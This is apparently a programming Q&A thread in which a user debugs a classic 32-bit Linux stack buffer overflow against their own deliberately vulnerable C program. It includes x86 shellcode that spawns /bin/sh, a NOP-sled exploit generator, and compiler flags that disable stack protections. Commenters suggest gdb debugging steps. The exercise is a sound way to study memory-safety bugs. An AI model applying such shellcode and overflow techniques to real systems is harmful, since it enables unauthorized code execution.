# Executing a Buffer Overflow for my vulnerable program not working

Tags: c, linux, buffer-overflow

I have the following program in C:

```
#include <stdio.h>
#include <string.h>

void foo(char * name) {
   char buf[128];
   strcpy(buf, "The next step is... ");
   strcat(buf, name);
   strcat(buf, ".");
   puts(buf);
}
int main(int argc, char ** argv) {
   if (argc < 2)
      puts("Please enter a command line parameter.");
   else
      foo(argv[1]);
   return 0;
}
```

And this is my program to exploit the code:

```
#include <stdio.h>
#include <string.h>

char shellcode[] = "\xeb\x02\xeb\x15\xe8\xf9\xff\xff\xff"
                   "/bin/shXYYYYZZZZ\x5b\x89\x5b\x08\x31"
                   "\xc0\x88\x43\x07\x89\x43\x0c\xb0\x0b"
                   "\x8d\x4b\x08\x8d\x53\x0c\xcd\x80"
                   "\x30\xf3\xff\bf";

int main() {
   int i;
   //128 buffer length, 20 string length, 4 oldEBP, 4 return address
   for (i=0; i<128-20-strlen(shellcode)+4+4; i++) printf("\x90");
   printf("%s", shellcode);
   return 0;
}
```

The vulnerable program is compiled as follows:

```
gcc -fno-stack-protector -z execstack -m32 -fno-pie -g -o vuln vuln.c
```

I get the return address from gdb:

```
(gdb) x/xb buf
0xbffff330:     0x88
```

I get a segmentation fault and I wonder if I miss an address to overwrite or what I'm doing wrong.

It's running on a 32 bit Ubuntu 10.04 VM.

Running `i r`:

[image]

Comment: On current OSs these older exploits might not work as they used to, because these OSs now have different safeguards against it, such as ASLR (which can be [disabled](https://stackoverflow.com/questions/5194666/disable-randomization-of-memory-addresses) though..).

Comment: I deactivated ASLR

Comment: If it is disabled, the problem might be elsewhere

Comment: Your code does not seem to be correct one. You have a function `foo`, but calling `some_function`.

Comment: Yes, I saw it and already edited it. And no, that's not the problem.

Comment: It might also be because the compiler generates different code and the exploit doesn't work anymore. You need to debug this at the assembly level.

Comment: probably something has changed with the stack layout.  Use gdb to see where the actual SEGV is and why it is happening.

Comment: It seems super risky to allow random shell code to be posted.

Comment: @ChrisDodd I runned it and got this with `backtrace`: `Backtrace stopped:  previous frame inner to this frame (corrupted stack?)` Is there another Linux version I could use for this?

Comment: @Jan: that at least indicates that you successfully overwrote the stack frame (corrupting it).  Use gdb's `info regs` command (or just `i  r`) to display the register values and try to figure out where it is and how it got there.

Comment: I updated my question with the output. As far as I know the original address of the EIP is important?

Comment: I found the correct number of `\x90` to fill the buffer and then executing my shell. Thanks @ChrisDodd for the `info regs` command

Comment: @jan, Is this difference important? `printf("%zu %zu\n", sizeof shellcode, strlen(shellcode));`, 53 vs 52?

Comment: No, I don't think so.